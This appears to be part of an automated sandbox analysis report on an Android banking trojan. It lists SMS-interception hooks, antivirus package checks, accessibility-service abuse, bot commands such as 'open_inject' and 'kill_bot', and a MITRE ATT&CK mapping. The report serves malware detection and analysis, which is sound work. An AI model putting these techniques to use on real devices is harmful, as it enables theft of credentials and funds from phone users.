Source: Lorg/ccil/cowan/tagsoup/HTMLSchema;-><init>()V | Method string: "os"
Source: Lorg/slf4j/LoggerFactory;->isAndroid()Z | Method string: "android"
Source: Lcom/coinbase/android/accessibilityprotection/ProtectedView;->setType(Ljava/lang/String;)V | Method string: "type"
Source: Lorg/xbill/DNS/OPTRecord;-><init>(IIIILjava/util/List;)V | Method string: "version"
Source: Lpiuk/blockchain/androidcore/data/auth/AuthService$getSessionId$1$1;->apply(Lretrofit2/Response;)Ljava/lang/String; | Method string: "sid"
Source: Lorg/ccil/cowan/tagsoup/HTMLSchema;-><init>()V | Method string: "phone"
Source: Lpiuk/blockchain/android/ui/transactionflow/plugin/SmallBalanceView;->access$getModel$p(Lpiuk/blockchain/android/ui/transactionflow/plugin/SmallBalanceView;)Lpiuk/blockchain/android/ui/transactionflow/engine/TransactionModel; | Method string: "model"
Source: La/a/a/a/z$g$a;->g()Landroid/os/Bundle; | Method string: "time"
Source: Lorg/objenesis/strategy/PlatformDescription;->e(Ljava/lang/Class;)I | Method string: "sdk"
Source: cabbage.grace.solid.util.b;->h:84 | API Call: android.provider.Settings.Secure.getString
Source: piuk.blockchain.androidcore.utils.DeviceIdGeneratorImpl;->generateId:9 | API Call: android.provider.Settings$Secure.getString

Anti Debugging:

Access the class loader (often done to load new code)
Source: trouble.canyon.van.MIfUpWsMoKa;->suittent:113 | API Call: java.lang.Class.getDeclaredField("mClassLoader")
Source: Ltrouble/canyon/van/MIfUpWsMoKa;->suittent(Ljava/lang/String;Ljava/lang/Class;)Ljava/lang/reflect/Field; | Method string: "mClassLoader"
Source: Ltrouble/canyon/van/MIfUpWsMoKa;->firmblue()Ljava/lang/StringBuilder; | Method string: "mClassLoader"
Source: piuk.blockchain.androidcore.utils.DeviceIdGeneratorImpl;->generateWifiMacId:41 | API Call: java.net.NetworkInterface.getHardwareAddress
Source: piuk.blockchain.androidcore.utils.DeviceIdGeneratorImpl;->generateWifiMacId:44 | API Call: java.net.NetworkInterface.getHardwareAddress
Source: cabbage.grace.solid.util.b;->f:65 | API Call: android.telephony.TelephonyManager.getNetworkCountryIso returned ""
Source: cabbage.grace.solid.util.b;->f:68 | API Call: android.telephony.TelephonyManager.getNetworkCountryIso

Lowering of HIPS / PFW / Operating System Security Settings:

May check for installed Android security applications (AV and firewalls)
Source: Lcabbage/grace/solid/util/a;-><clinit>()V | Method string: "com.avast.android.mobilesecurity"
Source: Lcabbage/grace/solid/util/a;-><clinit>()V | Method string: "com.kms.free"
Source: Lcabbage/grace/solid/util/a;-><clinit>()V | Method string: "com.wsandroid.suite"
Source: Lcabbage/grace/solid/util/a;-><clinit>()V | Method string: "com.eset.ems2.gp"
Source: Lcabbage/grace/solid/util/a;-><clinit>()V | Method string: "com.avira.android"
Source: Lcabbage/grace/solid/util/a;-><clinit>()V | Method string: "com.drweb"

Stealing of Sensitive Information:

Uses accessibility services (likely to control other applications)
Source: cabbage.grace.solid.util.k;->b:20 | API Call: android.view.accessibility.AccessibilityNodeInfo.findAccessibilityNodeInfosByText
Source: cabbage.grace.solid.receiver.anwdioANWDIOawnd;->onReceive:9 | API Call: android.telephony.SmsMessage.createFromPdu
Source: submitted apk | Request permission: android.permission.READ_SMS
Source: submitted apk | Request permission: android.permission.READ_PHONE_STATE
Source: submitted apk | Request permission: android.permission.RECEIVE_SMS
Source: submitted apk | Request permission: android.permission.GET_ACCOUNTS
Source: cabbage.grace.solid.receiver.anwdioANWDIOawnd | Registered receiver: android.provider.Telephony.SMS_RECEIVED
Source: cabbage.grace.solid.receiver.anwdioANWDIOawnd;->onReceive:14 | API Call: android.telephony.SmsMessage.getOriginatingAddress
Source: cabbage.grace.solid.receiver.anwdioANWDIOawnd;->onReceive:21 | API Call: android.telephony.SmsMessage.getMessageBody
Source: cabbage.grace.solid.util.b;->i:89 | API Call: android.content.pm.PackageManager.getInstalledApplications
Source: org.webrtc.Camera1Enumerator;->enumerateFormats:31 | API Call: android.hardware.Camera.open
Source: org.webrtc.Camera1Enumerator;->getCameraIndex:77 | API Call: android.hardware.Camera.getNumberOfCameras
Source: org.webrtc.Camera1Enumerator;->getCameraInfo:87 | API Call: android.hardware.Camera.getCameraInfo
Source: org.webrtc.Camera1Enumerator;->getSupportedFormats:111 | API Call: android.hardware.Camera.getNumberOfCameras
Source: org.webrtc.Camera1Enumerator;->getDeviceNames:119 | API Call: android.hardware.Camera.getNumberOfCameras
Source: org.webrtc.Camera1Session;->create:46 | API Call: android.hardware.Camera.open
Source: org.webrtc.Camera1Session;->create:50 | API Call: android.hardware.Camera.getCameraInfo
Source: com.facebook.common.util.UriUtil;->isLocalCameraUri:37 | Field access: android.provider.MediaStore$Images$Media.EXTERNAL_CONTENT_URI
Source: com.facebook.common.util.UriUtil;->isLocalCameraUri:40 | Field access: android.provider.MediaStore$Images$Media.INTERNAL_CONTENT_URI
Source: b.a.a.a.e.r1;->k:64 | API Call: android.accounts.Account.name
Source: org.webrtc.Camera1Session;-><init>:20 | API Call: android.media.MediaRecorder.setCamera
Source: Lcabbage/grace/solid/h/j;->a()V | Method string: "open_activity"
Source: Lcabbage/grace/solid/h/c;->a(Landroid/accessibilityservice/AccessibilityService;)V | Method string: "ask_syspass"
Source: Lcabbage/grace/solid/h/a;->a(Landroid/content/Context;)V | Method string: "activate_screen"
Source: Lcabbage/grace/solid/h/i;->a(Landroid/accessibilityservice/AccessibilityService;Landroid/view/accessibility/AccessibilityEvent;)V | Method string: "mute_phone"
Source: Lpiuk/blockchain/androidcoreui/utils/logging/PairingMethod;-><clinit>()V | Method string: "reverse"
Source: Lcabbage/grace/solid/h/k;->a(Landroid/accessibilityservice/AccessibilityService;Landroid/view/accessibility/AccessibilityEvent;)V | Method string: "open_inject"
Source: Lcabbage/grace/solid/h/h;->a()V | Method string: "kill_bot"
Source: Lcabbage/grace/solid/h/l;->a()V | Method string: "reset_pass"
Source: Lcom/coinbase/android/PinStorage/PinStorageModule;->deleteScreenProtectPreference()V | Method string: "pin_enabled_app_open"
Source: Lcabbage/grace/solid/h/b;->a(Landroid/accessibilityservice/AccessibilityService;Landroid/view/accessibility/AccessibilityEvent;)V | Method string: "app_delete"
Source: Lcabbage/grace/solid/h/d;->a()V | Method string: "ask_perms"
Source: Lorg/webrtc/voiceengine/WebRtcAudioRecord;->reportWebRtcAudioRecordStartError(Lorg/webrtc/voiceengine/WebRtcAudioRecord$AudioRecordStartErrorCode;Ljava/lang/String;)V | Method string: "start recording error: "
Source: Lcabbage/grace/solid/h/b;->a(Landroid/accessibilityservice/AccessibilityService;Landroid/view/accessibility/AccessibilityEvent;)V | Method string: "app_delete"
Source: Lcabbage/grace/solid/h/j;->a()V | Instruction: "const-string v3, "open_activity""
Source: Lcabbage/grace/solid/h/c;->a(Landroid/accessibilityservice/AccessibilityService;)V | Instruction: "const-string v1, "ask_syspass""
Source: Lcabbage/grace/solid/h/a;->a(Landroid/content/Context;)V | Instruction: "const-string v2, "activate_screen""
Source: Lcabbage/grace/solid/h/i;->a(Landroid/accessibilityservice/AccessibilityService;Landroid/view/accessibility/AccessibilityEvent;)V | Instruction: "const-string v1, "mute_phone""
Source: Lorg/apache/commons/collections4/comparators/ReverseComparator;-><init>()V | Instruction: "lorg/apache/commons/collections4/comparators/reversecomparator;-><init>(ljava/util/comparator;)v"
Source: Lcabbage/grace/solid/h/k;->a(Landroid/accessibilityservice/AccessibilityService;Landroid/view/accessibility/AccessibilityEvent;)V | Instruction: "const-string v1, "open_inject""
Source: Lcabbage/grace/solid/h/h;->a()V | Instruction: "const-string v3, "kill_bot""
Source: Lcabbage/grace/solid/h/l;->a()V | Instruction: "const-string v2, "reset_pass""
Source: Lcom/coinbase/android/PinStorage/PinStorageModule;->deleteScreenProtectPreference()V | Instruction: "const-string v1, "pin_enabled_app_open""
Source: Lpiuk/blockchain/android/ui/start/PasswordRequiredActivity$twoFATimer$2$1;->onFinish()V | Instruction: "lcom/blockchain/preferences/walletstatus;->setresendsmsretries(i)v"
Source: Lcabbage/grace/solid/h/b;->a(Landroid/accessibilityservice/AccessibilityService;Landroid/view/accessibility/AccessibilityEvent;)V | Instruction: "const-string v0, "app_delete""
Source: Lcabbage/grace/solid/h/d;->a()V | Instruction: "const-string v2, "ask_perms""
Source: Lorg/webrtc/voiceengine/WebRtcAudioRecord;->reportWebRtcAudioRecordStartError(Lorg/webrtc/voiceengine/WebRtcAudioRecord$AudioRecordStartErrorCode;Ljava/lang/String;)V | Instruction: "const-string v1, "start recording error: ""
Source: Lcabbage/grace/solid/h/b;->a(Landroid/accessibilityservice/AccessibilityService;Landroid/view/accessibility/AccessibilityEvent;)V | Instruction: "const-string v0, "app_delete""

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation | Path Interception | Path Interception | Application Discovery 11 | Capture SMS Messages 1 | System Network Connections Discovery 1 | Remote Services | Capture Audio 11 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS 1 | Remotely Track Device Without Authorization | Carrier Billing Fraud 1
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Obfuscated Files or Information 1 | Access Stored Application Data 1 | Application Discovery 11 | Remote Desktop Protocol | Network Information Discovery 1 | Exfiltration Over Bluetooth | Non-Application Layer Protocol 2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | System Information Discovery 1 | SMB/Windows Admin Shares | Screen Capture 1 | Automated Exfiltration | Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | Process Discovery 1 | Distributed Component Object Model | Capture SMS Messages 1 | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | Remote System Discovery | SSH | Access Stored Application Data 1 | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.